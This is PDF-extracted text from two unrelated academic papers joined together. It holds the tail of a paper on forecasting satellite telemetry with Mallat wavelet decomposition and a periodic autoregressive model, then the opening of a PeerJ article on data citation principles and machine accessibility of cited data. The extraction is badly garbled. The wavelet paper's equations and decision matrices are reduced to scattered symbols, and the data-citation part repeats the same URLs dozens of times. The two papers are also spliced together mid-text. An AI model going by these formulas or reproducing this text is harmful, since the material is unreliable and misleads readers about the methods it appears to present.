) ( )f t L R ,get , , ( ) ( ) j k j k j k Z f t c t    (3) Take the inner product in the side of the equation with ,j k  , because  , , ( ) j k j k Z t  is the orthonormal basis of 2 ( )L R , get , , j k j k c f  , thus to be , , , ( ) , ( ) j k j k j k Z f t f t     (4) From multi-resolution analysis, we can know that any function jf of jV ,can be expressed as the following form 2 ( )L R , 1 1 2 2 1 1 1 j j j j j j M M M j f f d f d d f d d d                     Among 1 1 , 1, 1, ( ) ( ) ( ) ( ) j j j j k j k k j k k j k k k k f t c t c t d t            (5) j f represents the low frequency components of ( ) M f t , while ( ), , , 1ld t l M j  indicates the high frequency components of jf at different resolutions. Because of 1 1 1, 1, 1, ( ) ( ) ( ) ( ) j j j j k j k k j k k j k k k k f t c t c t d t            and ,  and binary translation and scalability of orthogonality, Can be obtained 1 , 1, 2 , j j j k n j n j k n n k n n c c c h          (6) 1 , 1, 2 , j j j k n j n j k n n k n n d c c g          (7) The formula (6) and (7) called Wavelet decomposition algorithm of Mallat algorithm, among wherein  k k Zh  is a filter coefficient sequence by a two-scale equation corresponding orthogonal scaling functions. 2) Reconstruction algorithm of mallat algorithm The reconstruction algorithm of mallat algorithm is the inverse process of its decomposition algorithm. the convolution of mallat algorithm is represented: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 30 1 1 1 1 ( ) ( ) ( ) ( ) j j j j j j j c D c h d D c g c Uc h Ud g                 (8) Among , h  is represented conjugate inversion of filter h; jc h   represent conjugate of j c and h  ; ( ) j D c h   represent Under the dual sampling of conjugate jc h  . III. THE RESEARCH OF TELEMETRY DATA TIME SERIES PREDICTION BASED ON MALLAT ALGORITHM A. The characteristics of telemetry data Telemetry data has the characteristics of non-stationary variation, commonly used statistics of the telemetry data (such as the mean and autocorrelation function, etc.) often varies with time changing, it bring very great difficulty to the telemetry data forecast. Through the telemetry data 1 and 2 (table 1, 2) statistics, difference is very big, every stage of the statistical parameters show that the sequence of non-stationary time series. Wavelet analysis to deal with this kind of data has a great advantage. TABLE I. THE TEST RESULTS OF A REMOTE SENSING DATA 1 STATIONARITY Time 24 60 120 240 Mean Value 608.618 620.9572 622.6287 622.6287 Variance 198.2080 604.1601 611.2902 674.6010 TABLE II. THE TEST RESULTS OF A REMOTE SENSING DATA 2 STATIONARITY Time 24 60 120 240 Mean Value 29.2479 35.413 37.1234 39.2378 Variance 10.3366 30.9019 37.4902 42.5010 Figures 1, 2 is telemetry data 1 and 2 for four hours of change curve, it can be seen that the output power sequence is periodicity, as well as randomness. The coexistence of periodicity and randomness, the result can be seen as the superposition of different frequency components, these frequency components superimposed on each other in the interior have similar frequency characteristics and the same variation. If the subsequence to establish a prediction model for single change, due to the change of the data characteristics of a single, reduce the difficulty of forecasting model selection. Figure 1. Data of 1 consecutive 4 hours curve graph Figure 2. Data of 2 consecutive 4 hours curve graph B. The choice of wavelet function There are some mutations in the trend of spacecraft telemetry data, and these mutations reflect the actual state of the satellite. In order to accurately capture the point of the mutation, the wavelet function is usually required to have a fast convergence, which can quickly attenuate to zero [5] . In this paper, db3 wavelet is chosen as the wavelet base for the different scale of a certain remote data sequence. DbN wavelet in N=1, 3, 4, 1, the results of 2 scale decomposition of a telemetry data (Figure 3). International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 31 Figure 3. Comparison results of dbN wavelet based N=1,2,3,4 The choice of wavelet function can satisfy the following 3 conditions except that the condition and the regularity condition [2] . 1)Good compact support； 2) ( )t has vanishing moments; vanishing moments can make the wavelet function has a good locality in the frequency domain; 3)Satisfy orthogonality. C. Wavelet decomposition scale study Due to the telemetry data is not stable, its change cycle is difficult to see, and its change is slow and fast change together, that is, the change of telemetry data cycle is the size of the cycle of nested together. Therefore, Separating different frequency component can make its change rule is more intuitive, and can also improve data non-stationary [6] .The figure 4 Show the results that comparison db3 wavelet approximation part aN decomposed at different scales and a0 of the original sequence. Figure 4. Comparison of different decomposition scale approximation section It can be seen that the decomposition scale is 2, the curve of the approximate part a2 has smooth enough, and basically maintained the shape of the original curve, while A3, A4, because of the increase in the number of points, the sampling point is reduced, the approximate partial curve is too smooth, the sequence of changes in the trend has been distorted, so this paper chose the decomposition of 2. D. Forecasting model of time series Time series forecasting [3][7] is one of the methods of statistical analysis. Its modeling idea is the basic assumption that the change of the past of the telemetry data will continue into the future, that is, the future is a continuation of the past. In this paper, the use of the periodic autoregressive model (PAR model) [8][9] is as follows: If there is a time series X, the expression is 0 1, 1 2, 2 ,t t t t t t p t t p t X a a X a X a x           (9) Meet the following conditions: 1) t is independent sequence,Expected Value is 0 t E  , variance is 2 2 t t E  ; 2)For any 0,1, ,i p  , it it Ta a  , 2 2 t it T     , 0, 1,t    , among T is a positive number,and the model is model of PAR, T is the Cycle length of PAR model,t is phase of PAR model. The forecast model of the telemetry data is: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 32 Set 1 2, , , nX X X is telemetry data samples of per minute, the value of ( )tX h in the future h is the t h X  in the condition of t, and thus as its predictive value, denoted as ˆ (1)nX , according to the definition of: Decomposition for telemetry data sequence prediction model is established for an hour, the selection of the length of the cycle is 60, namely, p=T=60. This load sequence PAR prediction model can be represented by the expression of the following: E. Predicted results analysis The predicted values of the reconstructed sub sequences of the scales are compared with the original output power trends(Figure 5). Figure 5. Comparison results between predicted values and actual results By analyzing the comparison between an actual telemetry data and the predicted value, it can be seen that the boundary of the predicted results and the trend of mutation is not very ideal. In this paper, the extension of the periodic continuation to the boundary of the sequence is extended. The idea of periodic continuation is that the signal is considered as a periodic signal, and the extension process is as follows [10][11] : , 0 , 1 n n M n n M x x n x x n M         Among, M is the length of sequence. The comparison result of the prediction curve and the actual curve after eliminating the boundary error is shown in Figure 6. Figure 6. The comparison results between the predicted values and the actual values of the modified boundary From Figure 6, we can see that the results of the prediction of the sequence are better than the results obtained by the wavelet transform. IV. THE PERFORMANCE EVALUATION OF THE TELEMETRY DATA FORECASTING MODEL Thought of optimal decision method is using linear transform to normalize the attribute value, and at the same time using the ideal point and negative ideal point, compared with the traditional method has more rationality and reliability. The ideal point is the best solution, and its target value is the best, the worst is the worst. The worst is the worst.The optimal solution algorithm is as follows: International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 33 A. Set decision matrix of A is 1 1 1 1 2 11 2 2 2 22 1 2 ( ) ( ) ( )( ) ( ) ( ) ( )( ) ( ) ( ) ( ) ( ) n n p P P P n f x f x f xf x f x f x f xf x A f x f x f x f x                      (10) to 1 2 min( ( ), ( ), , ( )}, 1, 2, , i i i i n U f x f x f x i k   (11) 1 2 max( ( ), ( ), , ( )}, 1, 2, , i i i i n U f x f x f x i k k P     1 2 max{ ( ), ( ), , ( )}, 1, 2, , i i i i n V f x f x f x i k   1 2 min{ ( ), ( ), , ( )}, 1, 2, , i i i i n V f x f x f x i k k P     B. To determine the ideal point and negative ideal point The ideal point: * 1 2 1 2 ( , , , , , , , ) T k k k P x U U U U U U      (12) Negative ideal point: 1 2 , 1, ( , , , , ) T k k P x V V V V V     C. Calculate the close degree The proximity of the ideal point 1 1 ( )1 [ ], 1, 2, , ( ) pk j j i i j j kj i j U f x R i n P f x U        (13) The proximity of the negative ideal point 1 1 ( )1 [ ], 1, 2, , ( ) pk j i j i j j kj j i f x V r i n P V f x        (14) D. Calculate the relative close degree , 0 1, 1, 2, ,i i i i i R i n r R        (15) By calculating the formula (1) (11) (12) is as follows: The ideal point: * 1 2 1 2 1.23, 0.978, 4.219,1.49( , , , , , , , ) 1 T k k k P x U U U U U U      （） Negative ideal point: 1 2 , 1, ( , , , , ) 3.76, 3.679, 7.896, 4.118 T k k P x V V V V V     （） Calculate the relative close degree by the formula (13) (14) (15): =0.34 From the relative closeness of view, the time series forecasting model program has a higher rationality and reliability. V. CONCLUSION This paper studies the telemetry data forecasting method based on wavelet analysis. Through the analysis of the characteristics of the telemetry data, the characteristics of the non - stationary and certain periodicity of the telemetry data are established, and the prediction algorithm based on wavelet analysis is established. By choosing different wavelet bases and the decomposition scale, the decomposition results show that 2, db3 wavelet decomposition scale is the best. Based on the Mallat algorithm, the time series forecasting model is established according to the characteristics of detail data and approximate data. The experimental results show that the predicted values are in good agreement with the actual values. Finally, through the analysis of the performance of the forecasting model, the forecasting model is reasonable and reliable. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.02, 2019 34 REFERENCE [1] Li-Zhi Cheng,Hong-Xia Wang,Yong Luo.The theory and application of the wavelet[M].beijing:Science press,2004:75-116 [2] Xiang-Bing Meng.Research and implementation of short term load forecasting model based on wavelet analysis[D].dalian:Computer application technology of Dalian University of Technology,2008. [3] Jian Tang,Jia-Hui Luan,Chen Lv.Interval forecasting technique of remote sensing data for small satellite power supply system[J].Journal of Huazhong University of Science and Technology (NATURAL SCIENCE EDITION),2009(1):209-212. [4] Jia-Lin Zhang,Xiao-Jun Wei.Based on the optimization model of target decision method and its application research[J].Financial theory and practice.2007(145):114-119. [5] Zhen-Ming Sun.Forecasting theory and technology in the application of the spacecraft[D].haerbing:Harbin institute of technology,2004. [6] Zhen-Ming Sun,Wei-Guang An,Hui Zhang.Spacecraft data to predict the causal relation adjustment technology application research[J].Journal of aerospace,2006(6):1323-1327. [7] Keon-Tae SOHN,Deuk-Kyun RHA.The 3-Hour-Interval Prediction of Ground-Level Temperature[J].Advanced in Atmosphric Sicences.2003(4):576-583. [8] Chang-il K,In-keun Y,Y.H.Song.Kohonen neural network and wavelet transform based approach to short-trem load forecasting [J]. .Electric Power Systems Research,2002(3):167-176. [9] Soltani Skander.On the use of the wavelet decmpositoin for time series prediction[J].Neurocomotuing,2002(9):267-277. [10] Zheng hua,zhang lizi.The factor Analysis of short-trem laod forecast based on wavelet transform[J].IEEE,2002:165-169. [11] Zhang B L,Coggins R.Multiresolution forecasting for futures trading using wavelet decmpositions[J].IEEE Trans-actions on Neural Netoworks,2001,12(4):765~774. work_jvoiujigvff45klae5xermbbae ---- Achieving human and machine accessibility of cited data in scholarly publications Submitted 15 December 2014 Accepted 5 February 2015 Published 27 May 2015 Corresponding author Tim Clark, tim clark@harvard.edu Academic editor Harry Hochheiser Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.1 Distributed under Creative Commons Public Domain Dedication OPEN ACCESS Achieving human and machine accessibility of cited data in scholarly publications Joan Starr1, Eleni Castro2, Mercè Crosas2, Michel Dumontier3, Robert R. Downs4, Ruth Duerr5, Laurel L. Haak6, Melissa Haendel7, Ivan Herman8, Simon Hodson9, Joe Hourclé10, John Ernest Kratz1, Jennifer Lin11, Lars Holm Nielsen12, Amy Nurnberger13, Stefan Proell14, Andreas Rauber15, Simone Sacchi13, Arthur Smith16, Mike Taylor17 and Tim Clark18 1 California Digital Library, Oakland, CA, United States of America 2 Institute of Quantitative Social Sciences, Harvard University, Cambridge, MA, United States of America 3 Stanford University School of Medicine, Stanford, CA, United States of America 4 Center for International Earth Science Information Network (CIESIN), Columbia University, Palisades, NY, United States of America 5 National Snow and Ice Data Center, Boulder, CO, United States of America 6 ORCID, Inc., Bethesda, MD, United States of America 7 Oregon Health and Science University, Portland, OR, United States of America 8 World Wide Web Consortium (W3C)/Centrum Wiskunde en Informatica (CWI), Amsterdam, Netherlands 9 ICSU Committee on Data for Science and Technology (CODATA), Paris, France 10 Solar Data Analysis Center, NASA Goddard Space Flight Center, Greenbelt, MD, United States of America 11 Public Library of Science, San Francisco, CA, United States of America 12 European Organization for Nuclear Research (CERN), Geneva, Switzerland 13 Columbia University Libraries/Information Services, New York, NY, United States of America 14 SBA Research, Vienna, Austria 15 Institute of Software Technology and Interactive Systems, Vienna University of Technology/TU Wien, Austria 16 American Physical Society, Ridge, NY, United States of America 17 Elsevier, Oxford, United Kingdom 18 Harvard Medical School, Boston, MA, United States of America ABSTRACT Reproducibility and reusability of research results is an important concern in scien- tific communication and science policy. A foundational element of reproducibility and reusability is the open and persistently available presentation of research data. However, many common approaches for primary data publication in use today do not achieve sufficient long-term robustness, openness, accessibility or uniformity. Nor do they permit comprehensive exploitation by modern Web technologies. This has led to several authoritative studies recommending uniform direct citation of data archived in persistent repositories. Data are to be considered as first-class schol- arly objects, and treated similarly in many ways to cited and archived scientific and scholarly literature. Here we briefly review the most current and widely agreed set of principle-based recommendations for scholarly data citation, the Joint Declaration of Data Citation Principles (JDDCP). We then present a framework for operationalizing the JDDCP; and a set of initial recommendations on identifier schemes, identifier How to cite this article Starr et al. (2015), Achieving human and machine accessibility of cited data in scholarly publications. PeerJ Comput. Sci. 1:e1; DOI 10.7717/peerj-cs.1 mailto:tim_clark@harvard.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.1 http://dx.doi.org/10.7717/peerj-cs.1 http://creativecommons.org/publicdomain/zero/1.0/ http://creativecommons.org/publicdomain/zero/1.0/ http://creativecommons.org/publicdomain/zero/1.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.1 resolution behavior, required metadata elements, and best practices for realizing programmatic machine actionability of cited data. The main target audience for the common implementation guidelines in this article consists of publishers, scholarly organizations, and persistent data repositories, including technical staff members in these organizations. But ordinary researchers can also benefit from these recommen- dations. The guidance provided here is intended to help achieve widespread, uniform human and machine accessibility of deposited data, in support of significantly im- proved verification, validation, reproducibility and re-use of scholarly/scientific data. Subjects Human–Computer Interaction, Data Science, Digital Libraries, World Wide Web and Web Science Keywords Data citation, Machine accessibility, Data archiving, Data accessibility INTRODUCTION Background An underlying requirement for verification, reproducibility, and reusability of scholarship is the accurate, open, robust, and uniform presentation of research data. This should be an integral part of the scholarly publication process.1 However, Alsheikh-Ali et al. (2011) 1 Robust citation of archived methods and materials—particularly highly variable materials such as cell lines, engineered animal models, etc.—and software—are important questions not dealt with here. See Vasilevsky et al. (2013) for an excellent discussion of this topic for biological reagents. found that a large proportion of research articles in high-impact journals either weren’t subject to or didn’t adhere to any data availability policies at all. We note as well that such policies are not currently standardized across journals, nor are they typically optimized for data reuse. This finding reinforces significant concerns recently expressed in the scientific literature about reproducibility and whether many false positives are being reported as fact (Colquhoun, 2014; Rekdal, 2014; Begley & Ellis, 2012; Prinz, Schlange & Asadullah, 2011; Greenberg, 2009; Ioannidis, 2005). Data transparency and open presentation, while central notions of the scientific method along with their complement, reproducibility, have met increasing challenges as dataset sizes grow far beyond the capacity of printed tables in articles. An extreme example is the case of DNA sequencing data. This was one of the first classes of data, along with crystallographic data, for which academic publishers began to require database accession numbers as a condition of publishing, as early as the 1990’s. At that time sequence data could actually still be published as text in journal articles. The Atlas of Protein Sequence and Structure, published from 1965 to 78, was the original form in which protein sequence data was compiled: a book, which could be cited (Strasser, 2010). Today the data volumes involved are absurdly large (Salzberg & Pop, 2008; Shendure & Ji, 2008; Stein, 2010). Similar transitions from printed tabular data to digitized data on the web have taken place across disciplines. Reports from leading scholarly organizations have now recommended a uniform approach to treating research data as first-class research objects, similarly to the way textual publications are archived, indexed, and cited (CODATA-ICSTI Task Group , 2013; Altman & King, 2006; Uhlir, 2012; Ball & Duke, 2012). Uniform citation of robustly archived, Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 2/22 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.1 described, and identified data in persistent digital repositories is proposed as an important step towards significantly improving the discoverability, documentation, validation, reproducibility, and reuse of scholarly data (CODATA-ICSTI Task Group , 2013; Altman & King, 2006; Uhlir, 2012; Ball & Duke, 2012; Goodman et al., 2014; Borgman, 2012; Parsons, Duerr & Minster, 2010). The Joint Declaration of Data Citation Principles (JDDCP) (Data Citation Synthesis Group, 2014) is a set of top-level guidelines developed by several stakeholder organizations as a formal synthesis of current best-practice recommendations for common approaches to data citation. It is based on significant study by participating groups and independent scholars.2 The work of this group was hosted by the FORCE11 (http://force11.org) 2 Individuals representing the following organizations participated in the JDDCP development effort: Biomed Central; California Digital Library; CODATA-ICSTI Task Group on Data Citation Standards and Practices; Columbia University; Creative Commons; DataCite; Digital Science; Elsevier; European Molecular Biology Laboratories/European Bioinformatics Institute; European Organization for Nuclear Research (CERN); Federation of Earth Science Information Partners (ESIP); FORCE11.org; Harvard Institute for Quantitative Social Sciences; ICSU World Data System; International As- sociation of STM Publishers; Library of Congress (US); Massachusetts General Hospital; MIT Libraries; NASA Solar Data Analysis Center; The National Academies (US); OpenAIRE; Rensselaer Polytechnic Institute; Research Data Alliance; Science Exchange; National Snow and Ice Data Center (US); Natural Environment Research Council (UK); National Academy of Sciences (US); SBA Research (AT); National Information Standards Organization (US); University of California, San Diego; University of Leuven/KU Leuven (NL); University of Oxford; VU University Amsterdam; World Wide Web Consortium (Digital Publishing Activity). See https://www.force11.org/ datacitation/workinggroup for details. community, an open forum for discussion and action on important issues related to the future of research communication and e-Scholarship. The JDDCP is the latest development in a collective process, reaching back to at least 1977, to raise the importance of data as an independent scholarly product and to make data transparently available for verification and reproducibility (Altman & Crosas, 2013). The purpose of this document is to outline a set of common guidelines to operationalize JDDCP-compliant data citation, archiving, and programmatic machine accessibility in a way that is as uniform as possible across conforming repositories and associated data citations. The recommendations outlined here were developed as part of a community process by participants representing a wide variety of scholarly organizations, hosted by the FORCE11 Data Citation Implementation Group (DCIG) (https://www.force11.org/ datacitationimplementation). This work was conducted over a period of approximately one year beginning in early 2014 as a follow-on activity to the completed JDDCP. Why cite data? Data citation is intended to help guard the integrity of scholarly conclusions and provides a basis for integrating exponentially growing datasets into new forms of scholarly publishing. Both of these goals require the systematic availability of primary data in both machine- and human-tractable forms for re-use. A systematic review of current approaches is provided in CODATA-ICSTI Task Group (2013). Three common practices in academic publishing today block the systematic reuse of data. The first is the citation of primary research data in footnotes, typically either of the form, “data is available from the authors upon request”, or “data is to be found on the authors’ laboratory website, http://example.com”. The second is publication of datasets as “Supplementary File” or “Supplementary Data” PDFs where data is given in widely varying formats, often as graphical tables, and which in the best case must be laboriously screen-scraped for re-use. The third is simply failure in one way or another to make the data available at all. Integrity of conclusions (and assertions generally) can be guarded by tying individual assertions in text to the data supporting them. This is done already, after a fashion, for image data in molecular biology publications where assertions based on primary data contained in images typically directly cite a supporting figure within the text Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 3/22 https://peerj.com/computer-science/ http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org http://force11.org https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitation/workinggroup https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation https://www.force11.org/datacitationimplementation http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://example.com http://dx.doi.org/10.7717/peerj-cs.1 containing the image. Several publishers (e.g., PLoS, Nature Publications, and Faculty of 1000) already partner with data archives such as FigShare (http://figshare.com), Dryad (http://datadryad.org/), Dataverse (http://dataverse.org/), and others to archive images and other research data. Citing data also helps to establish the value of the data’s contribution to research. Moving to a cross-discipline standard for acknowledging the data allows researchers to justify continued funding for their data collection efforts (Uhlir, 2012; CODATA-ICSTI Task Group , 2013). Well defined standards allow bibliometric tools to find unanticipated uses of the data. Current analysis of data use is a laborious process and rarely performed for disciplines outside of the disciplines considered the data’s core audience (Accomazzi et al., 2012). The eight core Principles of data citation The eight Principles below have been endorsed by 87 scholarly societies, publishers and other institutions.3 Such a wide endorsement by influential groups reflects, in our view, 3 These organizations include the American Physical Society, Association of Research Libraries, Biomed Cen- tral, CODATA, CrossRef, DataCite, DataONE, Data Registration Agency for Social and Economic Data, ELIXIR, Elsevier, European Molecular Biology Laboratories/European Bioinformatics Institute, Leibniz Institute for the Social Sciences, Inter-University Consortium for Political and Social Research, International Association of STM Publishers, International Union of Biochemistry and Molecular Biology, International Union of Crystallography, International Union of Geodesy and Geophysics, National Information Standards Organization (US), Nature Publishing Group, OpenAIRE, PLoS (Public Library of Science), Research Data Alliance, Royal Society of Chemistry, Swiss Institute of Bioinformatics, Cambridge Crystallographic Data Centre, Thomson Reuters, and the University of California Curation Center (California Digital Library). the meticulous work involved in preparing the key supporting studies (by CODATA, the National Academies, and others (CODATA-ICSTI Task Group , 2013; Uhlir, 2012; Ball & Duke, 2012; Altman & King, 2006) and in harmonizing the Principles; and supports the validity of these Principles as foundational requirements for improving the scholarly publication ecosystem. • Principle 1—Importance: “Data should be considered legitimate, citable products of research. Data citations should be accorded the same importance in the scholarly record as citations of other research objects, such as publications.” • Principle 2—Credit and Attribution: “Data citations should facilitate giving scholarly credit and normative and legal attribution to all contributors to the data, recognizing that a single style or mechanism of attribution may not be applicable to all data.” • Principle 3—Evidence: “In scholarly literature, whenever and wherever a claim relies upon data, the corresponding data should be cited.” • Principle 4—Unique Identification: “A data citation should include a persistent method for identification that is machine actionable, globally unique, and widely used by a community.” • Principle 5—Access: “Data citations should facilitate access to the data themselves and to such associated metadata, documentation, code, and other materials, as are necessary for both humans and machines to make informed use of the referenced data.” • Principle 6—Persistence: “Unique identifiers, and metadata describing the data, and its disposition, should persist—even beyond the lifespan of the data they describe.” • Principle 7—Specificity and Verifiability: “Data citations should facilitate identifica- tion of, access to, and verification of the specific data that support a claim. Citations or citation metadata should include information about provenance and fixity sufficient to facilitate verifying that the specific time slice, version and/or granular portion of data retrieved subsequently is the same as was originally cited.” Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 4/22 https://peerj.com/computer-science/ http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://figshare.com http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://datadryad.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dataverse.org/ http://dx.doi.org/10.7717/peerj-cs.1 • Principle 8—Interoperability and Flexibility: “Citation methods should be sufficiently flexible to accommodate the variant practices among communities, but should not differ so much that they compromise interoperability of data citation practices across communities.” These Principles are meant to be adopted at an institutional or discipline-wide scale. The main target audience for the common implementation guidelines in this article consists of publishers, scholarly organizations, and persistent data repositories. Individual researchers are not meant to set up their own data archives. In fact this is contrary to one goal of data citation as we see it—which is to get away from inherently unstable citations via researcher footnotes indicating data availability at some intermittently supported laboratory website. However individual researchers can contribute to and benefit from adoption of these Principles by ensuring that primary research data is prepared for archival deposition at or before publication. We also note that often a researcher will want to go back to earlier primary data from their own lab—robust archiving positively ensures it will remain available for their own use in future, whatever the vicissitudes of local storage and lab personnel turnover. Implementation questions arising from the JDDCP The JDDCP were presented by their authors as Principles. Implementation questions were left unaddressed. This was meant to keep the focus on harmonizing top-level and basically goal-oriented recommendations without incurring implementation-level distractions. Therefore we organized a follow-on activity to produce a set of implementation guidelines intended to promote rapid, successful, and uniform JDDCP adoption. We began by seeking to understand just what questions would arise naturally to an organization that wished to implement the JDDCP. We then grouped the questions into four topic areas, to be addressed by individuals with special expertise in each area. 1. Document Data Model—How should publishers adapt their document data models to support direct citation of data? 2. Publishing Workflows—How should publishers change their editorial workflows to support data citation? What do publisher data deposition and citation workflows look like where data is being cited today, such as in Nature Scientific Data or GigaScience? 3. Common Repository Application Program Interfaces (APIs)—Are there any ap- proaches that can provide standard programmatic access to data repositories for data deposition, search and retrieval? 4. Identifiers, Metadata, and Machine Accessibility—What identifier schemes, identifier resolution patterns, standard metadata, and recommended machine programmatic accessibility patterns are recommended for directly cited data? The Document Data Model group noted that publishers use a variety of XML schemas (Bray et al., 2008; Gao, Sperberg-McQueen & Thompson, 2012; Peterson et al., 2012) to model scholarly articles. However, there is a relevant National Information Standards Starr et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.1 5/22 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.1 Organization (NISO) specification, NISO Z39.96-2012, which is increasingly used by publishers, and is the archival form for biomedical publications in PubMed Central. 4 This4 NISO Z39.96-2012 is derived from the former “NLM-DTD” model originally developed by the US National Library of Medicine. group therefore developed a proposal for revision of the NISO Journal Article Tag Suite to support direct data citation. NISO-JATS version 1.1d2 (National Center for Biotechnology Information, 2014), a revision based on this proposal, was released on December 29, 2014, by the JATS Standing Committee, and is considered a stable release, although it is not yet an official revision of the NISO Z39.96-2012 standard. The Publishing Workflows group met jointly with the Research Data Alliance’s Publishing Data Workflows Working Group to collect and document exemplar publishing workflows. An article on this topic is in preparation, reviewing basic requirements and exemplar workflows from Nature Scientific Data, GigaScience (Biomed Central), F1000Research, and Geoscience Data Journal (Wiley). The Common Repository APIs group is currently planning a pilot activity for a common API model for data repositories. Recommendations will be published at the conclusion of the pilot. This work is being undertaken jointly with the ELIXIR (http:// www.elixir-europe.org/) Fairport working group. The Identifiers, Metadata, and Machine Accessibility group’s recommendations are presented in the remainder of this article. These recommendations cover: • definition of machine accessibility; • identifiers and identifier schemes; • landing pages; • minimum acceptable information on landing pages; • best practices for dataset description; and • recommended data access methods. RECOMMENDATIONS FOR ACHIEVING MACHINE ACCESSIBILITY What is machine accessibility? Machine accessibility of cited data, in the context of this document and the JDDCP, means access by well-documented Web services (Booth et al., 2004)—preferably RESTful Web services (Fielding, 2000; Fielding & Taylor, 2002; Richardson & Ruby, 2011) to data and metadata stored in a robust repository, independently of integrated browser access by humans. Web services are methods of program-to-program communication using Web protocols. The World Wide Web Consortium (W3C, http://www.w3.org) defines them as “software system[s] designed to support interoperable machine-to-machine interaction over a network” (Haas & Brown, 2004). Web services are always “on” and function essentially as utilities, providing services such as computation and data lookup, at web 